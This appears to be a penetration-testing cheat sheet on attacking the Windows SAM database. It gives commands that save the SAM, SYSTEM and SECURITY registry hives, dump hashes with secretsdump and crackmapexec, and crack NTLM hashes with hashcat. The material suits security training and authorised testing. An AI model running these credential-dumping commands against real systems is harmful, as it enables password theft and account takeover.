Attacking SAM
The Security Accounts Manager (SAM) is a database file in the Microsoft Windows operating system containing user names and passwords.
Locations
The files that are relevant for the SAM are placed in the Windows Registry.
Registry Hive | Description |
---|---|
hklm\sam | Contains the hashes associated with local account passwords. |
hklm\system | Contains the system bootkey, which is used to encrypt the SAM database. |
hklm\security | Contains cached credentials for domain accounts. |
Copy Registry hives with reg.exe
To copy the SAM database you need to have at least local administrator privilege.
- Use
reg.exe
to savehklm\sam
.
1
reg.exe save hklm\sam C:\sam.save
2. Use reg.exe
to save hklm\system
.
1
reg.exe save hklm\system C:\system.save
3. 1. Use reg.exe
to save hklm\security
.
1
reg.exe save hklm\security C:\security.save
Dumping hashes with secretsdump
!!! note
1
The boot key is mandatory. Dumping those hashes without the boot key is not possible, because the boot key is used to encrypt & decrypt the SAM database.
Copy the files to the attacking machine and start cracking with secretsdump
. The hashes are encrypted with the bootkey
which is located in the hklm\system
hive. Without the bootkey, the password cannot be decrypted.
1
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
The hashes are being dunped in the following format:
1
uid:rid:lmhash:nthash
Dumping SAM remotely
The hashes from the SAM database can also be dumped remotely with crackmapexec
. The variables $ip
, $username
, and $password
needs to be replaces with the actual values. You need at least to have credentials that have local admin privileges to the victim machine.
1
crackmapexec smb $ip --local-auth -u $username -p $password --lsa
Cracking hashes with hascat
After dumping the hashes, hashcat can be used to crack the hashes to reveal the plain-text passwords.
1
sudo hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
-m 1000
=> Set hashtype to NTLM hashes.